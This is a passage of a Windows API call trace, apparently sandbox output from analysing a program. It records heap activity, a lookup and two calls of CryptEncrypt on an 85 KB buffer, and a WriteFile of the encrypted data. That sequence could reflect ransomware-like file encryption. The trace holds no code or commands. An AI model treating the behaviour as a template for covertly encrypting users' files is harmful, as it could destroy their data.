0x2e514d8 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0243.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14dee) returned 0x2e94118 [0243.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0243.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e94118 | out: hHeap=0x970000) returned 1 [0243.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0243.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0243.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0243.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0243.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0243.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0243.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0243.970] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0243.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0243.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0243.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0243.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0243.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0243.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0243.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0243.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0243.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0243.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0243.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0243.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0243.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51430, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0243.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0243.973] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0243.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0243.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0243.973] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x14dee, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14df0) returned 1 [0243.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.973] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0243.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0243.973] CharLowerBuffW (in: lpsz="byte[85488]", cchLength=0xb | out: lpsz="byte[85488]") returned 0xb [0243.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.044] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.044] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ce0 | out: hHeap=0x970000) returned 1 [0244.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0244.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0244.044] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0244.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0244.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0244.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0244.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0244.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0244.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0244.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0244.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0244.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0244.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0244.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0244.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0244.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0244.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0244.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14dee) returned 0x2ea8f10 [0244.048] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0244.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0244.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51508 [0244.049] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51508, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0244.049] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94118*, pdwDataLen=0x8cef60*=0x14dee, dwBufLen=0x14df0 | out: pbData=0x2e94118*, pdwDataLen=0x8cef60*=0x14df0) returned 1 [0244.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0244.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0244.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0244.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0244.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0244.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0244.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0244.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0244.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0244.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0244.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0244.056] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0244.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0244.056] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0244.057] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0244.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0244.057] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0244.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d88 [0244.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.057] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0244.057] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0244.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0244.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.057] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0244.057] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0244.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0244.057] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0244.057] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0244.058] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0244.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0244.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0244.058] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.058] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0244.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0244.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0244.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0244.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0244.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0244.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0244.079] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x14df0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x14df0, 